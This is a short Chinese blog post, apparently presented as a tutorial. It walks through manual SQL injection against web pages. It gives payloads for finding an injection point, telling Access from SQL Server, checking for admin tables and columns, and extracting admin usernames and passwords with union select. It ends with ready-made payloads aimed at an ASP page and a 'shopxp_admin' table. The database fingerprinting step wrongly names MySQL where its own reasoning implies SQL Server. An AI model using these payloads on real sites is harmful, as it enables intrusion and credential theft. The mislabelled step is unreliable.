检测有没有注入点:

  • A+
所属分类:mysql教程
摘要

检测 有没有 注入 点: 直接加一个’号,返回错误页初步断定有漏洞! 然后 and 1=1 返回正常 and 1=2 返回错误调用查询时候有漏洞!然后查什么数据库! 代码: and (select count (*) from sysobjects)=0 返回错误说明是Access数据库 因为Access没有sysobject

检测 有没有 注入 点: 直接加一个'号,返回错误页初步断定有漏洞! 然后 and 1=1 返回正常 and 1=2 返回错误调用查询时候有漏洞!然后查什么数据库! 代码: and (select count (*) from sysobjects)=0 返回错误说明是Access数据库 因为Access没有sysobject

检测有没有注入点:
直接加一个'号,返回错误页初步断定有漏洞!
然后 and 1=1 返回正常 and 1=2 返回错误调用查询时候有漏洞!然后查什么数据库!
代码: and (select count (*) from sysobjects)>=0 返回错误说明是Access数据库 因为Access没有sysobjects系统表!

如果返回正常那就打下面的代码:
and (select count (*) from msysobjects)>=0 如果返回错误 说明是 mysql数据库 因为 sql server没有msysobjects系统表!

之后查询没有没有admin表,代码:
and exists(select * from admin) 返回正常说明有admin表 返回错误说明没有!

然后查询admin表有没有admin,password两个字段!代码:
and exists(select admin from admin) 返回正常说明有! 错误则没有!
and exists(select password from admin) 返回正常说明有! 错误则没有!
最后联合查询
order by 查该页面共有多少字段
union select 1,2,3,4,5,6,........n from admin 查账户名和密码的字段 位置

TEXTBOX2.ASP?action=modify&newsi%64=

shopxp_admin
and exists(select * from shopxp_admin)
and exists(select admin from shopxp_admin)

union select 1,2,admin,4,5,6,7 from shopxp_admin

union select 1,2,password,4,5,6,7 from shopxp_admin

and exists(select admin from shopxp_admin)

除非注明,否则均为@蒲公英网原创文章,转载必须以链接形式标明本文链接

本文链接:https://www.aipgy.com/414197.html

avatar

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: